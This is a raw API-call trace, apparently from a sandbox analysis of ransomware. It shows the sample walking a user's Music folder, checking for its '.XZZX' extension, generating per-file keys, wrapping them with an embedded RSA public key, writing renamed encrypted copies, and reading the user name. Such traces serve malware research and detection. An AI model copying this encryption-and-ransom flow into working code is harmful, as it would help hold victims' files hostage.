SetErrorMode (uMode=0x1) returned 0x1 [0116.212] lstrcpyW (in: lpString1=0x420f860, lpString2="A191878831212978B3B60CE1354E0DC0.XZZX" | out: lpString1="A191878831212978B3B60CE1354E0DC0.XZZX") returned="A191878831212978B3B60CE1354E0DC0.XZZX" [0116.212] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x78acac1f, Data2=0x476d, Data3=0x484a, Data4=([0]=0xbb, [1]=0xfe, [2]=0xe1, [3]=0xb, [4]=0xb3, [5]=0xfe, [6]=0xe4, [7]=0x6f))) returned 0x0 [0116.213] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\A191878831212978B3B60CE1354E0DC0.XZZX") returned 96 [0116.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0116.213] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\4541E233142B4D8278ACAC1F184C31CA.XZZX") returned 96 [0116.213] StrStrW (lpFirst="A191878831212978B3B60CE1354E0DC0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 367 os_tid = 0x8c4 [0116.367] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0116.367] lstrcpyW (in: lpString1=0x420f460, lpString2="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX" | out: lpString1="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX") returned="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX" [0116.367] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0116.367] SetErrorMode (uMode=0x1) returned 0x1 [0116.367] lstrcpyW (in: lpString1=0x420f860, lpString2="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX" | out: lpString1="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX") returned="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX" [0116.367] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x62c0a60, Data2=0xa0ba, Data3=0x487b, Data4=([0]=0x8e, [1]=0x7, [2]=0xd4, [3]=0xfb, [4]=0x5f, [5]=0x1b, [6]=0xe7, [7]=0x88))) returned 0x0 [0116.368] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\B5A4F8D81D2BC280A6FB77022143A6C8.XZZX") returned 96 [0116.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0116.368] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\027B89C02D81895E062C0A6031A26DA6.XZZX") returned 96 [0116.368] StrStrW (lpFirst="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 368 os_tid = 0x8c8 [0116.523] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0116.523] lstrcpyW (in: lpString1=0x420f460, lpString2="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX" | out: lpString1="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX") returned="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX" [0116.523] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0116.523] SetErrorMode (uMode=0x1) returned 0x1 [0116.523] lstrcpyW (in: lpString1=0x420f860, lpString2="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX" | out: lpString1="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX") returned="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX" [0116.523] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x51537ae5, Data2=0x9ffa, Data3=0x451c, Data4=([0]=0x82, [1]=0x1a, [2]=0x53, [3]=0x2e, [4]=0x85, [5]=0x62, [6]=0xe4, [7]=0xdd))) returned 0x0 [0116.523] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\C8E8BDDC263509ECACA7C0D62A50EE34.XZZX") returned 96 [0116.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0116.523] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\44DA3EA22B2FE15851537AE52F50C5A0.XZZX") returned 96 [0116.523] StrStrW (lpFirst="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 369 os_tid = 0x8cc [0116.681] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0116.681] lstrcpyW (in: lpString1=0x420f460, lpString2="E003588E3DA0B59DC1493EC641B899E5.XZZX" | out: lpString1="E003588E3DA0B59DC1493EC641B899E5.XZZX") returned="E003588E3DA0B59DC1493EC641B899E5.XZZX" [0116.681] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0116.681] SetErrorMode (uMode=0x1) returned 0x1 [0116.681] lstrcpyW (in: lpString1=0x420f860, lpString2="E003588E3DA0B59DC1493EC641B899E5.XZZX" | out: lpString1="E003588E3DA0B59DC1493EC641B899E5.XZZX") returned="E003588E3DA0B59DC1493EC641B899E5.XZZX" [0116.681] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x88595272, Data2=0xb096, Data3=0x4c16, Data4=([0]=0x85, [1]=0x17, [2]=0x3c, [3]=0x26, [4]=0x5d, [5]=0x7, [6]=0x4a, [7]=0xf1))) returned 0x0 [0116.681] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\E003588E3DA0B59DC1493EC641B899E5.XZZX") returned 96 [0116.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0116.681] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\4D04AECC347BB4E488595272389C992C.XZZX") returned 96 [0116.681] StrStrW (lpFirst="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 370 os_tid = 0x8d0 [0116.835] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0116.835] lstrcpyW (in: lpString1=0x420f460, lpString2="EED603F80D860CC870D6498A119DF110.XZZX" | out: lpString1="EED603F80D860CC870D6498A119DF110.XZZX") returned="EED603F80D860CC870D6498A119DF110.XZZX" [0116.835] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0116.835] SetErrorMode (uMode=0x1) returned 0x1 [0116.835] lstrcpyW (in: lpString1=0x420f860, lpString2="EED603F80D860CC870D6498A119DF110.XZZX" | out: lpString1="EED603F80D860CC870D6498A119DF110.XZZX") returned="EED603F80D860CC870D6498A119DF110.XZZX" [0116.835] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xd0b8c391, Data2=0xde6f, Data3=0x4190, Data4=([0]=0xbe, [1]=0xbc, [2]=0x87, [3]=0xa3, [4]=0xd4, [5]=0x2a, [6]=0x24, [7]=0x3))) returned 0x0 [0116.835] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\EED603F80D860CC870D6498A119DF110.XZZX") returned 96 [0116.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0116.835] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\B9B489DF38F74D70D0B8C3913D1831B8.XZZX") returned 96 [0116.835] StrStrW (lpFirst="EED603F80D860CC870D6498A119DF110.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 371 os_tid = 0x8d4 [0117.011] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0117.011] lstrcpyW (in: lpString1=0x420f460, lpString2="2zrMBovJou.wav" | out: lpString1="2zrMBovJou.wav") returned="2zrMBovJou.wav" [0117.011] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0117.011] SetErrorMode (uMode=0x1) returned 0x1 [0117.011] lstrcpyW (in: lpString1=0x420f860, lpString2="2zrMBovJou.wav" | out: lpString1="2zrMBovJou.wav") returned="2zrMBovJou.wav" [0117.011] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xea0895e3, Data2=0x2d71, Data3=0x4c09, Data4=([0]=0xae, [1]=0x16, [2]=0x90, [3]=0x6e, [4]=0x93, [5]=0xa6, [6]=0x6e, [7]=0x85))) returned 0x0 [0117.011] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\2zrMBovJou.wav") returned 87 [0117.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0117.011] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\D02310330D7F24F9EA0895E311A00941.XZZX") returned 110 [0117.011] StrStrW (lpFirst="2zrMBovJou.wav", lpSrch="XZZX") returned 0x0 [0117.011] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\2zrMBovJou.wav", dwFileAttributes=0x20) returned 1 [0117.012] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\2zrMBovJou.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\2zrmbovjou.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x53c [0117.013] ReadFile (in: hFile=0x53c, lpBuffer=0x3cc7980, nNumberOfBytesToRead=0x163bf, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cc7980*, lpNumberOfBytesRead=0x420e418*=0x163bf, lpOverlapped=0x0) returned 1 [0117.014] CloseHandle (hObject=0x53c) returned 1 [0117.015] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0117.015] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0117.016] SetErrorMode (uMode=0x1) returned 0x1 [0117.016] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0117.016] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc5bb8) returned 1 [0117.020] CryptGenKey (in: hProv=0x3cc5bb8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5710) returned 1 [0117.169] CryptExportKey (in: hKey=0x3a5710, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0117.169] CryptExportKey (in: hKey=0x3a5710, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0117.169] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0117.169] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0117.169] CryptDestroyKey (hKey=0x3a5710) returned 1 [0117.170] CryptReleaseContext (hProv=0x3cc5bb8, dwFlags=0x0) returned 1 [0117.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\D02310330D7F24F9EA0895E311A00941.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\d02310330d7f24f9ea0895e311a00941.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x53c [0117.171] WriteFile (in: hFile=0x53c, lpBuffer=0x3cc7980*, nNumberOfBytesToWrite=0x163bf, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc7980*, lpNumberOfBytesWritten=0x420e438*=0x163bf, lpOverlapped=0x0) returned 1 [0117.172] SetFilePointer (in: hFile=0x53c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x163bf [0117.172] WriteFile (in: hFile=0x53c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0117.173] SetFilePointer (in: hFile=0x53c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x163c4 [0117.173] WriteFile (in: hFile=0x53c, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x1c, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x1c, lpOverlapped=0x0) returned 1 [0117.173] SetFilePointer (in: hFile=0x53c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x163e0 [0117.173] WriteFile (in: hFile=0x53c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0117.173] SetFilePointer (in: hFile=0x53c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x163e5 [0117.173] SetErrorMode (uMode=0x1) returned 0x1 [0117.173] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0117.173] OutputDebugStringW (lpOutputString="end") [0117.173] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0117.173] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0117.173] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cc5bb8) returned 1 [0117.174] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc5bb8, dwCertEncodingType=0x1, pInfo=0x3cb07f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb0828*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb0830*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a57d0) returned 1 [0117.174] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0117.175] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0117.175] CryptEncrypt (in: hKey=0x3a57d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0117.175] CryptEncrypt (in: hKey=0x3a57d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc5c40*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc5c40*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0117.175] WriteFile (in: hFile=0x53c, lpBuffer=0x3cc5c40*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc5c40*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0117.175] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0117.175] WriteFile (in: hFile=0x53c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0117.175] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0117.176] 